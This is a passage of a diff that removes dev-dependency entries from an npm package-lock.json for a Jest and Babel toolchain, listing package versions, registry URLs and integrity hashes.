"requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": 